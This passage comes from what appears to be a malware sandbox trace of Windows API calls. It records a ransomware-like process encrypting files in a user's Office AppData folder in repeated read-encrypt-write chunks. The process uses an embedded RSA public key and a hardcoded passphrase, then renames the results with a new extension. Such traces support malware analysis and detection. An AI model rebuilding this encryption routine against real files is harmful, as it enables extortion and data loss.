pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.502] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.502] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.502] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.502] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.502] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.502] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.502] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.502] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.502] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.502] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.502] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.502] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.502] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.502] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.502] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.503] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.503] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.503] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.503] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.503] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.503] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.503] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.503] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.503] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.503] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.503] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.503] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.503] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.503] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.503] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.503] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.503] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.504] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.504] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.504] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.504] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.504] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.504] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.504] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.504] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.504] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x33b, lpOverlapped=0x0) returned 1 [0269.504] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x33b, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x340) returned 1 [0269.504] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x340, lpOverlapped=0x0) returned 1 [0269.504] CloseHandle (hObject=0x5d48) returned 1 [0269.504] CloseHandle (hObject=0x5d3c) returned 1 [0269.504] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup64.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\setup64.exe_rules.xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup64.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\setup64.exe_rules.xml"), bFailIfExists=0) returned 1 [0269.511] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup64.exe_Rules.xml", dwFileAttributes=0x0) returned 1 [0269.512] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup64.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\setup64.exe_rules.xml.gsg")) returned 1 [0269.513] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup64.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\setup64.exe_rules.xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup64.exe_Rules.xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\setup64.exe_rules.xml.fuck")) returned 1 [0269.514] CryptDestroyHash (hHash=0x2fa488) returned 1 [0269.514] CryptDestroyKey (hKey=0x2fa748) returned 1 [0269.514] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0269.514] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0269.514] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0269.514] GetLastError () returned 0x0 [0269.514] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\visio.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\visio.exe_rules.xml")) returned 0x20 [0269.515] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\visio.exe_Rules.xml", dwFileAttributes=0x80) returned 1 [0269.516] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\visio.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\visio.exe_rules.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0269.517] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\visio.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\visio.exe_rules.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0269.518] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\visio.exe_Rules.xml.gsg", dwFileAttributes=0x2) returned 1 [0269.518] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0269.520] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0269.520] lstrlenA (lpString="yzLScEfviKODKVbxMUZoAxYXzMlQm") returned 29 [0269.520] CryptHashData (hHash=0x2fa548, pbData=0x28cb2b0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0269.520] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa548, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa888) returned 1 [0269.520] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0269.520] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0269.520] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f261a8) returned 1 [0269.520] CryptImportPublicKeyInfo (in: hCryptProv=0x2f261a8, dwCertEncodingType=0x1, pInfo=0x2f31320*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f31350*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f31358*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa388) returned 1 [0269.521] CryptEncrypt (in: hKey=0x2fa388, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0269.521] CryptEncrypt (in: hKey=0x2fa388, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f26230*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f26230*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0269.521] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f26230*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f26230*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0269.522] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.538] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.538] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.549] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.549] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.549] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.549] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.549] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.550] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.550] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.550] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.550] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.550] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.550] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.550] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.550] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.551] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.551] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.551] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.551] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.551] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.551] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.551] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.551] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.551] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.551] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.551] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.551] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.551] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.551] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.552] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.552] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.552] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.552] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.552] CryptEncrypt (in: 